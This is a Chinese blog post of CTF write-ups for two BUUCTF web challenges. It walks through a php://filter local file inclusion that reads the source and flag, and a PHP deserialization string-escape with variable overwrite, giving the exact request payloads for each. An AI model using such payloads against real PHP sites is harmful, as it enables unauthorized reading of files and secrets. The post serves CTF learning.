BUUCTF 25

最新推荐文章于 2024-04-08 18:45:14 发布
最新推荐文章于 2024-04-08 18:45:14 发布
阅读量300 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52431855/article/details/113750473
版权

知识点

  • strpos() 函数

  1. 语法:strpos(string,find,start)
  2. 参数:
  3. 作用:

反序列化的对象逃逸问题一般分为两种~~,首先是过滤函数分为两种情况

  • 第一种为关键词数增加
    例如: where->hacker,这样词数由五个增加到6个
  • 第二种为关键词数减少
    例如:直接过滤掉一些关键词

25-1 [BSidesCF 2020]Had a bad day

做题思路

首先点开发现两个按钮,然后点开之后会出现图片,url中 

猜测有注入,或文件包含,弹出include报错,那就是文件包含了

利用php://filter伪协议读取源码 

报错了发现后缀多了,于是去掉后缀,base64解码得到源码

<html>
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="description" content="Images that spark joy">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0">
    <title>Had a bad day?</title>
    <link rel="stylesheet" href="css/material.min.css">
    <link rel="stylesheet" href="css/style.css">
  </head>
  <body>
    <div class="page-layout mdl-layout mdl-layout--fixed-header mdl-js-layout mdl-color--grey-100">
      <header class="page-header mdl-layout__header mdl-layout__header--scroll mdl-color--grey-100 mdl-color-text--grey-800">
        <div class="mdl-layout__header-row">
          <span class="mdl-layout-title">Had a bad day?</span>
          <div class="mdl-layout-spacer"></div>
        <div>
      </header>
      <div class="page-ribbon"></div>
      <main class="page-main mdl-layout__content">
        <div class="page-container mdl-grid">
          <div class="mdl-cell mdl-cell--2-col mdl-cell--hide-tablet mdl-cell--hide-phone"></div>
          <div class="page-content mdl-color--white mdl-shadow--4dp content mdl-color-text--grey-800 mdl-cell mdl-cell--8-col">
            <div class="page-crumbs mdl-color-text--grey-500">
            </div>
            <h3>Cheer up!</h3>
              <p>
                Did you have a bad day? Did things not go your way today? Are you feeling down? Pick an option and let the adorable images cheer you up!
              </p>
              <div class="page-include">
              <?php
				$file = $_GET['category'];

				if(isset($file))
				{
					if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
						include ($file . '.php');
					}
					else{
						echo "Sorry, we currently only support woofers and meowers.";
					}
				}
				?>
			</div>
          <form action="index.php" method="get" id="choice">
              <center><button onclick="document.getElementById('choice').submit();" name="category" value="woofers" class="mdl-button mdl-button--colored mdl-button--raised mdl-js-button mdl-js-ripple-effect" data-upgraded=",MaterialButton,MaterialRipple">Woofers<span class="mdl-button__ripple-container"><span class="mdl-ripple is-animating" style="width: 189.356px; height: 189.356px; transform: translate(-50%, -50%) translate(31px, 25px);"></span></span></button>
              <button onclick="document.getElementById('choice').submit();" name="category" value="meowers" class="mdl-button mdl-button--colored mdl-button--raised mdl-js-button mdl-js-ripple-effect" data-upgraded=",MaterialButton,MaterialRipple">Meowers<span class="mdl-button__ripple-container"><span class="mdl-ripple is-animating" style="width: 189.356px; height: 189.356px; transform: translate(-50%, -50%) translate(31px, 25px);"></span></span></button></center>
          </form>

          </div>
        </div>
      </main>
    </div>
    <script src="js/material.min.js"></script>
  </body>
</html>

审计发现 传入的category需要有woofers,meowers,index才能包含传入以传入名为文件名的文件,我们要想办法包含flag.php
尝试直接读取/index.php?category=woofers/../flag 用index不可以得到下面的东西,但是没报错,所以应该是和代码有关,导致显示不同

发现显示不一样了,打开源码发现这个 

是否能读取这个flag,便继续利用php://filter伪协议读取flag,这里还涉及到php伪协议的嵌套使用

/index.php?category=php://filter/read=convert.base64-encode/index/resource=flag

最后解密即可得到flag

25-2 [安洵杯 2019]easy_serialize_php

做题思路

审计代码,首先发现

于是直接查看phpinfo,直接搜一些敏感点,fopen、disable_、root等等。第二行看到了独特的文件名。

拿到文件名,接下来就该想办法读取了

读取是有前提的,$function我们可以通过 $f 直接赋值,么的影响。

现在我们就要base64_decode($userinfo[‘img’])=d0g3_f1ag.php。

那么就要$userinfo[‘img’]=ZDBnM19mMWFnLnBocA==。

而$userinfo又是通过$serialize_info反序列化来的。

$serialize_info又是通过session序列化之后再过滤得来的。在这里插入图片描述

session里面的img在这里赋值,我们指定的话会被sha1哈希,到时候就不能被base64解密了。这里就到了一个难点了。
在这里插入图片描述

我们看到上面的过滤函数,会把一些长度的字符替换为0,这个和之前做过的这个题有异曲同工之处[0CTF 2016]piapiapia WP(详细),不过之前的那个题是变长,这个是变短。

直接看payload分析比较容易理解:

_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a";s:8:"function";s:7:"H9_dawn";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

因为有变量覆盖漏洞,所以它可以直接这样被赋值进去。

然后session被序列化之后会变成这样:

a:3:{s:4:"user";s:24:"flagflagflagflagflagflag";s:8:"function";s:68:"a";s:8:"function";s:7:"H9_dawn";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:28:"L3VwbG9hZC9ndWVzdF9pbWcuanBn";}

然后这串字符串经过过滤函数之后,会变成:

a:3:{s:4:"user";s:24:"";s:8:"function";s:68:"a";s:8:"function";s:7:"H9_dawn";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:28:"L3VwbG9hZC9ndWVzdF9pbWcuanBn";}

可以看到,24后面的6个flag被替换为空了,但是指定的长度还是24,怎么办呢?它会往后吞,不管什么符号,都吞掉24个字符。吞完之后变成了这样。

a:3:{s:4:"user";s:24:"";s:8:"function";s:68:"a";s:8:"function";s:7:"H9_dawn";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:28:"L3VwbG9hZC9ndWVzdF9pbWcuanBn";}

 

看,括号里的字符串就变成了user的值,这时候我们自己输入的function参数和img参数,就把真的参数替代掉了

注意格式,我看别人的WP没有function参数也是可以的,但是必须要凑够3个参数,因为一开始序列化的时候指定了有3个参数 。

get传 f=show_image,
post传:

_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a";s:8:"function";s:7:"H9_dawn";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

在这里插入图片描述
查看源代码发现了新的文件,

不能直接打开,给它进行base64编码(编码的时候 “/” 也要一起带进去),然后替换掉img的值,计算一下长度,都是20,那不用改长度了。

所以最后的结果是:
get传 f=show_image,
post传:

_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a";s:8:"function";s:7:"H9_dawn";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

 

 

小杌
关注
密码学-->buuctf 25~36
qq2489021103的博客
04-11 499
25.RSA3 c1=22322035275663237041646893770451933509324701913484303338076210603542612758956262869640822486470121149424485571361007421293675516338822195280313794991136048140918842471219840263536338886250492682739436410013436651161720725855484866690084788721349
BUUCTF-PWN刷题记录25(IO file attack)
weixin_44145820的博客
08-14 1610
背景知识 在做关于IO FILE的攻击的时候,对其中涉及的数据结构的了解必不可少,以下是几个关键的数据结构 FILE 结构 定义在 libio.h 中,如下 struct _IO_FILE { int _flags; /* High-order word is _IO_MAGIC; rest is flags. */ #define _IO_file_flags _flags /* The following pointers correspond to the C++ strea
NO.2-13
nigo134的博客
07-27 229
首先利用PHP伪协议读取index.php源代码 payload如下: php://filter/read=convert.base64-encode/resource=index 结果如图所示 源代码如下 <?php $file = $_GET['category']; if(isset($file)) { if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" )
[BSidesCF 2020]Had a bad day 1
shinygod的博客
03-13 524
知识点:伪协议嵌套,假路径包含 有参数,试验 有错误提示 读个源码看看 ?category=php://filter/convert.base64-encode/resource=index 拿到源码,解码 <?php $file = $_GET['category']; if(isset($file)) { if( strpos( $file, "woofers" ) !== false || strpos( $fi
BUUCTF刷题记录(持续更新中~)
热门推荐
xiaolong22333的博客
04-03 6万+
之前陆陆续续做过一些题,但都没有记录,这次打算巩固一下,记录下来。 .
BUUCTF打卡
Leo8283的博客
04-26 375
[BJDCTF2020]Cookie is so stable 根据提示关注Cookie 在输入框里输入{{7*7}} 页面上回显49 cookie里多了user 但直接用burp重发却没有,因为cookie里没有user,要根据前面的发现自己添加注入 是Twig模板 https://www.k0rz3n.com/2018/11/12/%E4%B8%80%E7%AF%87%E6%96%87%E7%AB%A0%E5%B8%A6%E4%BD%A0%E7%90%86%E8%..
BUUCTF——snake
vergame的博客
04-12 627
1,下载附件得到一张图片,在winhex中发现里面藏了一个压缩包,foremost分离出后解压得到两个文件。 2,打开key文件得到一串base64 V2hhdCBpcyBOaWNraSBNaW5haidzIGZhdm9yaXRlIHNvbmcgdGhhdCByZWZlcnMgdG8gc25ha2VzPwo= 3,解码后得到一句话 4,有啥不会就问度娘,百度查询得知 但是还是不知道下一步怎么做,看了看大佬(我大哥)的wp,知道蛇的英文还有serpent,同时它也是一种加密方式。 5,找到解码网站 ht
BUUCTF BabyRSA
qq_63719504的博客
07-15 457
BUUCTF BabyRSA 。本题考察数学中的平方和和平方差以及进制转换和最基础的RSA加密得到密文m。先用int('0x',16)将16进制转换成10进制。可以用来对bytes对象的内容进行显示。
buuctf逆向之xor题解
最新发布
qq_51274933的博客
04-08 442
将xor源文件拖入exeinfope中查壳,发现并没有加壳,并且该文件是一个mac文件下一步直接拖入idapro中进行静态分析,查看左侧函数funcation窗口,双击直接进入main函数在反汇编窗点击main所在行按f5查看伪代码。
BUUCTF(Alice and Bob)
Bigotry77的博客
07-28 1415
题目提示比较明显了,先把那一串数字分成两个素数的乘积,然后再使用工具解密 不过我一开始看到题目以为是要把那一串数字分成两个素数,,,然后感觉不太对,,,不知道会不会有人这样做,,, 然后就是用python写代码让那一串数字分成两个素数 代码如上(借鉴的。。。最后运行的时候需要输入三个数字,,,) 然后使用工具将这个数字按要求合并解密就行了(附工具:http://ctf.ssleye.com/hash.html) ...
文件包含(CTF)
ing_end的博客
04-02 1万+
文件包含 留言 连接数据库 查看留言 连接数据库 登录 连接数据库 注册 连接数据库 代码的重复 留言 查看留言 连接数据库单独的文件 登录 注册 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某个函数的时候,直接调用此文件,无需再次编写,这种调用文件的过程通常称为包含。 程序开发人员都希望代码更加灵活,所以通常会把被包含的文件设置为变量,来进行动态调用,但正是由于这种灵活性,从而导致客户端可以
BUUCTF-WEB刷题记录-2
weixin_44145820的博客
04-08 766
目录[极客大挑战 2019]Secret File[网鼎杯 2018]Fakebook [极客大挑战 2019]Secret File 一直F12 点了之后来到这里 怀疑是跳转,用burp suite抓包 secr3t.php <html> <title>secret</title> <meta charset="UTF-8"&gt...
BUUCTF__web题解合集(七)
风过江南乱的博客
08-17 950
1、[网鼎杯 2020 朱雀组]Nmap 2、 [网鼎杯 2020 朱雀组]phpweb 3、[BSidesCF 2020]Had a bad day 4、[BJDCTF2020]EasySearch 5、[WUSTCTF2020]朴实无华
buuctf wireshark
09-12
根据您提供的引用内容,buuctf wireshark 是一个与buuctf比赛相关的题目。其中,Wireshark 是一个网络封包分析软件,可以用来捕获和分析网络数据包。根据[1]中提供的下载地址,可以下载 Wireshark 软件进行使用。 ...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值